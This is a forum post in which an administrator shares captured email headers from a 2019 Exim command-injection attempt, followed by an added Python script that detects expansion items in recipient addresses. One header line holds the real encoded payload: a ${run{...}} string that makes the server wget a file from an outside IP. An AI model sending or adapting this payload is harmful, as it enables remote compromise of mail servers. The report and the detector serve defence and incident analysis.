Hello,
the same "attack" was carried out against me:
header:
01: Return-Path: <support [at] service.com>
02: Delivered-To: poor [at] spamvictim.tld
03: Received: from localhost (localhost [127.0.0.1])
04: by xx.com (Postfix) with ESMTP ID: [ID filtered]
05: for
06: <root+${run{x2Fbinx2Fsht-ctx22wgetx20213.227.155.101x2ftmpx2f2.59.132.181x22}}@xx.com>;
07: Wed, 19 Jun 2019 xx:xx:xx +0200 (CEST)
08: X-Quarantine-ID: [ID filtered]
09: X-Virus-Scanned: Debian amavisd-new at xx.com
10: X-Amavis-Alert: BAD HEADER SECTION, Missing required header field: "Date"
11: X-Spam-Flag: YES
12: X-Spam-Score: 12.981
13: X-Spam-Level: ************
14: X-Spam-Status: Yes, score=12.981 tagged_above=1 required=4.5
15: tests=[EMPTY_MESSAGE=2.344, MISSING_DATE=1.396, MISSING_FROM=1,
16: MISSING_HEADERS=1.207, MISSING_MID=0.14, MISSING_SUBJECT=1.767,
17: PYZOR_CHECK=1.985, RDNS_NONE=1.274, SPF_HELO_SOFTFAIL=0.896,
18: SPF_SOFTFAIL=0.972] autolearn=no autolearn_force=no
19: Subject: ***SPAM***
20: Received: from xx.com ([127.0.0.1])
21: by localhost (xx.com [127.0.0.1]) (amavisd-new, port 10024)
22: with ESMTP ID: [ID filtered]
23: Received: from service.com (unknown [68.183.4.19])
24: by xx.com (Postfix) with SMTP ID: [ID filtered]
25: Wed, 19 Jun 2019 xx:xx:xx +0200 (CEST)
26: Received: 1
27: Received: 2
28: Received: 3
29: Received: 4
30: Received: 5
31: Received: 6
32: Received: 7
33: Received: 8
34: Received: 9
35: Received: 10
36: Received: 11
37: Received: 12
38: Received: 13
39: Received: 14
40: Received: 15
41: Received: 16
42: Received: 17
43: Received: 18
44: Received: 19
45: Received: 20
46: Received: 21
47: Received: 22
48: Received: 23
49: Received: 24
50: Received: 25
51: Received: 26
52: Received: 27
53: Received: 28
54: Received: 29
55: Received: 30
56: Received: 31
57: Message-ID: [ID filtered]
58: Date: Wed, 19 Jun 2019 xx:xx:xx +0200 (CEST)
59: From: support [at] service.com
We are not running Exim either. 68.183.4.19 is reachable via the web; was his mail server perhaps hacked?
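The following is an added example, not part of the original post. It scans a message's header block for recipient addresses that contain an Exim-style expansion item such as the `${run{...}}` recorded in the `Received: ... for <...>` clause above. The function name, the choice of headers to inspect and the sample headers (with a placeholder instead of a command) are assumptions constructed for illustration.

```python
import re
from email.parser import HeaderParser

# Exim-style expansion item such as ${run{...}}: "${", an operator name, then "{".
EXPANSION = re.compile(r"\$\{\s*([A-Za-z_]+)\s*\{")
# Envelope recipient as recorded by the receiving MTA: "for <addr>"
FOR_CLAUSE = re.compile(r"\bfor\s+<([^>]*)>", re.IGNORECASE)
ADDRESS_HEADERS = {"to", "cc", "delivered-to", "return-path"}

def suspicious_recipients(raw_headers):
    """Return (header name, address text, operator) for each address in the
    header block that contains an expansion item."""
    msg = HeaderParser().parsestr(raw_headers)
    hits = []
    for name, value in msg.items():
        value = " ".join(str(value).split())  # unfold continuation lines
        if name.lower() == "received":
            candidates = FOR_CLAUSE.findall(value)
        elif name.lower() in ADDRESS_HEADERS:
            candidates = [value]
        else:
            continue
        for addr in candidates:
            match = EXPANSION.search(addr)
            if match:
                hits.append((name, addr, match.group(1).lower()))
    return hits

# Constructed sample headers; addresses, IDs and the payload are placeholders.
SAMPLE = (
    "Return-Path: <sender@example.org>\n"
    "Delivered-To: user@example.net\n"
    "Received: from localhost (localhost [127.0.0.1])\n"
    "\tby mx.example.net (Postfix) with ESMTP id 0000000000\n"
    "\tfor\n"
    "\t<root+${run{PLACEHOLDER_COMMAND}}@example.net>;\n"
    "\tWed, 19 Jun 2019 00:00:00 +0200 (CEST)\n"
    "Received: from mail.example.org (unknown [192.0.2.10])\n"
    "\tby mx.example.net (Postfix) with SMTP id 0000000001\n"
    "\tfor <user@example.net>; Wed, 19 Jun 2019 00:00:00 +0200 (CEST)\n"
    "Subject: test\n"
    "\n"
)

if __name__ == "__main__":
    for header, address, operator in suspicious_recipients(SAMPLE):
        print(f"{header}: expansion operator '{operator}' in recipient {address}")
```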